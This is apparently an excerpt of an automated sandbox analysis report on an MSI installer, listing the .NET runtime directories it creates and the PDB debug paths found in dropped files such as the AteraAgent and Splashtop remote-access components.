                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Metadata.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-datetime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.CSharp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.ResourceManager.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlSerializer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.deps.jsonJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Csp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-private-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.OpenSsl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore_amd64_amd64_6.0.3524.45918.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Quic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-namedpipe-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordaccore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.StackTrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\ucrtbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Queryable.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Overlapped.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.Encoding.CodePages.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-filesystem-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.DispatchProxy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.EventBasedAsync.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.Common.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.VisualC.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.NameResolution.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.ThreadPool.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Thread.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Registry.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Contracts.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.InteropServices.RuntimeInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Specialized.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-convert-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.SecureString.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.AppContext.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-handle-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-utility-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-process-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Resources.Writer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-string-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-fibers-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Buffers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Brotli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.ServicePoint.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.DataSetExtensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.X509Certificates.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tracing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Concurrent.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.FileVersionInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Debug.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Timer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\coreclr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Loader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.RegularExpressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Calendars.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.Unsafe.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TextWriterTraceListener.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-profile-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-locale-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Uri.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Watcher.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XmlDocument.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-errorhandling-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.CoreLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Algorithms.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\netstandard.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\hostJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxrJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxr\6.0.35Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\dotnet.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\LICENSE.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\ThirdPartyNotices.txtJump to behavior
                                Source: Arquivo_4593167.msiStatic file information: File size 2994176 > 1048576
                                Source: Binary string: System.Threading.Tasks.Dataflow.ni.pdb source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: Microsoft.CSharp.ni.pdb source: Microsoft.CSharp.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net6.0\System.Text.Encodings.Web.pdb source: System.Text.Encodings.Web.dll0.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Primitives\net6.0-Release\System.IO.FileSystem.Primitives.pdb source: System.IO.FileSystem.Primitives.dll.1.dr
                                Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.FileSystemGlobbing/Release/net6.0/Microsoft.Extensions.FileSystemGlobbing.pdb source: Microsoft.Extensions.FileSystemGlobbing.dll.24.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: c:\slave\workspace\GIT_WIN_Comp_SRUSB\Source_RemoteUSB_VH\src\platform\windows\Release\x64\SRUsb.pdb source: SRUsb.exe.1.dr
                                Source: Binary string: C:\projects\litedb\LiteDB\obj\Release\net4.5\LiteDB.pdb source: LiteDB.dll.24.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000014.00000002.1954998107.000001BE62A42000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.Cng\net6.0-windows-Release\System.Security.Cryptography.Cng.pdb source: System.Security.Cryptography.Cng.dll.1.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb( source: System.IO.Compression.ZipFile.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdb source: System.Runtime.InteropServices.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: System.Runtime.InteropServices.dll.24.dr
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: NLog.dll.24.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.IsolatedStorage\net6.0-windows-Release\System.IO.IsolatedStorage.pdb source: System.IO.IsolatedStorage.dll.1.dr
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/Release/net6.0-windows/System.Diagnostics.EventLog.pdbSHA256 source: System.Diagnostics.EventLog.dll.24.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb* source: System.Diagnostics.Process.dll.24.dr
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: c:\svn\branches\features\iris00_v3_20150407_69486\win32\stxpsdrv\src\filters\nup\objfre_win7_x86\i386\xdnup.pdb source: xdnup.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.1.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: c:\slave\workspace\GIT_WIN_Comp_SRUSB\Source_RemoteUSB_VH\src\platform\windows\Release\x64\SRUsb.pdbH source: SRUsb.exe.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Data.Common\net6.0-Release\System.Data.Common.pdb source: System.Data.Common.dll.1.dr
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
                                Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: System.Private.DataContractSerialization.dll.1.dr
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Dataflow\net6.0-Release\System.Threading.Tasks.Dataflow.pdb source: System.Threading.Tasks.Dataflow.dll.1.dr
                                Source: Binary string: System.Private.CoreLib.ni.pdb source: System.Private.CoreLib.dll.1.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Process\4.1.2.0\System.Diagnostics.Process.pdb source: System.Diagnostics.Process.dll.24.dr
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: NLog.dll.24.dr
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\netcoreapp3.1\Microsoft.Win32.TaskScheduler.pdb source: Microsoft.Win32.TaskScheduler.dll0.24.dr
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\SRUnPackFile.pdb source: SplashtopStreamer.exe, 00000024.00000002.2593578356.000000000042E000.00000002.00000001.01000000.0000001B.sdmp, SplashtopStreamer.exe, 00000024.00000000.2186291125.000000000042E000.00000002.00000001.01000000.0000001B.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\netcoreapp3.1\Microsoft.Win32.TaskScheduler.pdbSHA256 source: Microsoft.Win32.TaskScheduler.dll0.24.dr
                                Source: Binary string: System.IO.IsolatedStorage.ni.pdb source: System.IO.IsolatedStorage.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XDocument\net6.0-Release\System.Xml.XDocument.pdbt+ source: System.Xml.XDocument.dll.1.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: d:\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\Release\PreVerCheck.pdb source: PreVerCheck.exe, 00000025.00000000.2215637852.0000000000BE3000.00000002.00000001.01000000.0000001C.sdmp, PreVerCheck.exe, 00000025.00000002.2561997635.0000000000BE3000.00000002.00000001.01000000.0000001C.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: System.IO.Compression.ZipFile.dll.24.dr
                                Source: Binary string: C:\projects\litedb\LiteDB\obj\Release\net4.5\LiteDB.pdbSHA256 source: LiteDB.dll.24.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.1.dr
                                Source: Binary string: c:\svn\branches\features\iris00_v3_20150407_69486\win32\stxpsdrv\src\filters\nup\objfre_win7_x86\i386\xdnup.pdbh source: xdnup.dll.1.dr
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: System.Private.CoreLib.dll.1.dr
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Arquivo_4593167.msi
                                Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/Release/net6.0-windows/System.Diagnostics.EventLog.pdb source: System.Diagnostics.EventLog.dll.24.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
